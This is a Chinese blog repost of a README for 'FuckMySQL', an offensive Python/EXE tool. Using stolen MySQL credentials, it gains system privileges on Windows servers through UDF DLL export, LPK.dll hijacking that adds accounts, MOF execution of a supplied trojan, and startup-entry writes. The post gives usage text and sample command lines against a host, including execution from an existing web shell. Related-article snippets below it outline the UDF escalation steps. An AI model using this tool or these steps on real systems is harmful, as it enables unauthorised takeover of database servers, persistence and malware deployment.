mysql udf python_GitHub - huffery/Python_FuckMySQL: Using To MySQL Elevate Privileges.

最新推荐文章于 2021-08-14 14:51:21 发布
最新推荐文章于 2021-08-14 14:51:21 发布
阅读量204 收藏
点赞数
文章标签: mysql udf python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_28977123/article/details/113911266
版权

python-promoting-privileges

1.自动导出你的backdoor和mof文件,

2.自动判断mysql版本,根据版本不同导出UDF的DLL到不同目录,UDF提权

3.导出LPK.dll文件,劫持系统目录提权

4.写启动项提权

工具仅做方便使用,技术含量几乎没有。

用py脚本写的,也打包成exe了,个人用的还算顺手。

用法:

promote:PythonDemo v5est0r$ python root.py

__ _ __ __ ____ ___ _

/ _|_ _ ___| | _| \/ |_ _/ ___| / _ \| |

| |_| | | |/ __| |/ / |\/| | | | \___ \| | | | | Author:v5est0r

| _| |_| | (__|

|_| \__,_|\___|_|\_\_| |_|\__, |____/ \__\_\_____|

|___/

usage: root.py [-h] [-a HOST] [-o PORT] [-u USER] [-p PASSWD] [-e EXECUTE]

[-m METHOD]

fuckmysql

optional arguments:

-h, --help show this help message and exit

-a HOST, --host HOST MySQL server ip

-o PORT, --port PORT MySQL Port

-u USER, --user USER mysql UserName

-p PASSWD, --passwd PASSWD

mysql password

-e EXECUTE, --execute EXECUTE

command for UDF to execute

-m METHOD, --method METHOD

elevate method,eg:udf/mof/lpk/st

7a82fd479341ca7269a95b1786f8799f.png

我在虚拟机演示打包好的exe远程提权,坛子的老哥们都是明白人,我就不多说了,直接上图:

默认UDF提权,也可以-m udf指定方式,-e ipconfig指定执行的cmd,默认执行whoami:

root.exe -a 192.168.1.105 -p root -e "ver&whoami" -m udf

57873bff0c66bd154adc6fb4cc03b117.png

有时候UDF无效,我们使用LPK.dll劫持:

root.exe -a 192.168.1.105 -p root -m lpk

f8d07997a15c87919362d821f3ceae21.png

验证一下lpk是否加上账户:

b01404ddc61e45d95cc95bf617cadd83.png

有时候UDF和LPK都无效,目标是windows2003,还有机会,可以MOF:

把你的木马的hex复制到同目录的hex.txt就行了,程序会导出木马到指定目录,并用mof执行。

256aaaaa238eb45357400a53bb4c8421.png

每隔几秒就运行一次木马,有点尴尬,如何停止mof老司机都知道,我就不多说了。

166425a45fb8ec115dd4d2c6740543df.png

有时候UDF和LPK都无效,那我们只能尝试被动写启动项:

root.exe -a 192.168.1.105 -p root -m st

659d082f27996baab790d15f39bc040f.png

可能存在路径编码问题写不成功,你可以根据提示,用本地的MySQL连接上去,执行。

18a323ac2fcea4e30c075034ad768867.png

当然还有情况是远程提权,UDF不能创建plugin目录,网上流传的ADS流创建目录我是没有成功过,工具里加了ADS流创建目录的代码,那么我们删掉plugin目录,再远程试试:

298b9598e2376829df6d29859ad980fb.png

如上图,那就不行了,那么这种情况下,如果你有shell,在shell里的本地模式执行,就不一样了。

本地模式:

一般来说,php一般权限都是可以创建目录的,此处必须指定主机为localhost或127.0.0.1才会调用本地模式:

root.exe -a localhost -p root -e "ver&whoami" -m udf

bded248e5c5f07a4fe3a25ccfdbda5b4.png

臧竹萌123~~
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Mysql udf提权靶场-vulnhub Raven2
m0_62399876的博客
08-18 1665
最近学习的时候学到了udf提权,想着来实操一下。同时也记录一下我的理解。udf(User Defined Function)是用户自定义函数,是通过添加新函数,对MYSQL的功能进行扩充。udf的原意是为了让开发者能够自己写方便自己的函数。...
Fuck MySQL (1) Linux环境下MySQL忘记密码解决方法
大锐哥的技术专栏
04-12 118
转自:http://www.cnblogs.com/allenblogs/archive/2010/08/12/1798247.html 1.首先确认服务器出于安全的状态,也就是没有人能够任意地连接MySQL数据库。 因为在重新设置MySQL的root密码的期间,MySQL数据库完全出于没有密码保护的状态下,其他的用户也可以任意地登录和修改MySQL的信息。可以采用将MySQL对外的端口封...
mysql udf python_python mysql
weixin_36376765的博客
01-19 3834
#### python中使用mysql##### [](https://note.youdao.com/md/?defaultMode=view&fileId=WEB37964e4ede0a01eb3e8a99992f51f950#%E5%AE%89%E8%A3%85mysql%E6%A8%A1%E5%9D%97)安装mysql模块~~~sudo apt-get install pytho...
Fuck MySQL (2) Linux环境下MySQL用户登陆命令
大锐哥的技术专栏
04-12 81
转自:http://www.2cto.com/database/201209/154363.html 命令行登录语法: mysql –u用户名 [–h主机名或者IP地址] –p密码 说明:用户名是你登录的用户,主机名或者IP地址为可选项,如果是本地连接则不需要,远程连接需要填写,密码是对应用户的密码。 ...
Fuck MySQL (4) 设置root可从任意机器登陆
大锐哥的技术专栏
04-14 155
mysql> GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '密码' WITH GRANT OPTION; mysql> flush privileges;
MYSQL_UDF-5.0.rar_mysql udf_udf_udf mysql
09-23
udf mysql c语言代码,欢迎大家使用
ANSYS Fluent UDF Manual.rar_ANSYS FLUENT UDF_UDF manual_UDF-flu
07-15
ANSYS Fluent UDF Manual
kemodel.rar_UDF fluent_UDF-k-e_turbulence_udf_湍流
07-14
一个对Fluent中k-e湍流模型的修正udf程序,欢迎提出意见。
CentOS 7.5 64下编译好的lib_mysqludf_sys.so
10-12
CentOS 7.5 64位下编译好的lib_mysqludf_sys.so,源文件在https://download.csdn.net/download/shaynerain/10715798,我博客 中有介绍怎么用
mysql.zip_ROOT_mysql提权_udf_udf mysql_提权
09-19
提权用的 udf 得到root帐号可以用这个提权
MySQL通过UDF实现扩展功能(Linux环境和Windows环境)
JimCal
06-12 6265
    最近项目数据库选型,对于自治事务这个特性,在MySQL和PostGreSQL二者摇摆了很多时间,后来,发现,通过UDF可以巧妙实现,下面来记录下过程:    环境说明:        - 服务器环境: CentOS7.1        - 数据库环境: MYSQL5.7.19    //...
MySQL总结一 UDF提权
xiaopan233的博客
03-25 1927
UDF提权 kali 中文件位置 /usr/share/metasploit-framework/data/exploits/mysql 首先先要破解得到靶机的数据库密码。使用kali连接后。查看一些必要的属性 查看插件路径 show variables like "%plugin%"; 看到了插件目录了。我们来看看我们能通过什么方式将UDF插件放到这个目录...
Mysql-UDF提权
告白的博客
08-14 1756
0x00 提权简介 UDF介绍:User Defined Functions简称UDF,通俗来讲就是用户可自定义函数。udf提权就是利用到创建自定义函数(sys_eval),在mysql中调用这个自定义的函数(sys_eval)来实现获取对方主机的system的shell权限,从而达到提权的目的。 简单来说便是利用提权脚本放到对方mysql指定的目录下,运用脚本创建自定义函数,使用函数即可获取shell权限。 我们需要将duf.dll文件放入C:\phpStudy\MySQL\lib\plugin,前面路
mysql 5.5 udf提权_提权基础-----mysql-udf提权
weixin_39844267的博客
01-19 171
1.总结关于udf提权方法通过弱口令,爆破,网站配置文件等方式得到mysql数据库帐号密码,---还要能外连(1).将udf.dll代码的16进制数声明给my_udf_a变量set @my_udf_a=concat('',dll的16进制);(2).建表my_udf_data,字段为data,类型为longblob。create table my_udf_data(data LONGBLOB);(...
mysql udf 提权
完美落地
12-06 843
mysqludf提权方法 01 May 2013 UDF(用户定义函数)是一类对MYSQL服务器功能进行扩充的代码,通常是用C(或C++)写的。通过添加新函数,性质就象使用本地MYSQL函数abs()或concat()。当你需要扩展MYSQL服务器功能时,UDF通常是最好的选择。但同时,UDF也是黑客们在拥有低权限mysql账号时比较好用的一种提权方法。 适用场合: 1、目标主机系...
mysql udf 提权_高版本MySQLUDF提权
weixin_29207533的博客
01-25 555
看完整篇文章之后,我重新在高版本的MySQL上测试了一下许久不用的udf,想看看在什么情况下能提权成功,并且各个版本的MySQL在默认安装的情况下是什么样子的。环境将有三个分别是MySQL5.5.53,5.6.10,5.7.21 操作系统为win7在高版本中有个参数至关重要,就是secure-file-priv,这个参数限制了MySQL的导出;该参数为NULL时不允许导出、该参数为空时允许在任意文...
udf提权总结(Mysql)
Mikasa
05-06 848
什么是udf udf = ‘user defined function‘,即‘用户自定义函数’。 是通过添加新函数,对MYSQL的功能进行扩充,性质就象使用本地MYSQL函数如abs()或concat()。 udfmysql5.1以后的版本中,存在于‘mysql/lib/plugin’目录下,文件后缀为‘.dll’,常用c语言编写。 既然支持自定义函数那么我们如果想定义一个可以执行系统命...
fatal error: mysql/udf_registration_types.h: No such file or directory
最新发布
10-26
这个错误提示表明在编译过程中找不到mysql/udf_registration_types.h文件。这个文件是MySQL的一个头文件,包含了用户定义函数的相关信息。解决这个问题的方法是安装MySQL的开发库。你可以使用以下命令来安装:sudo ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值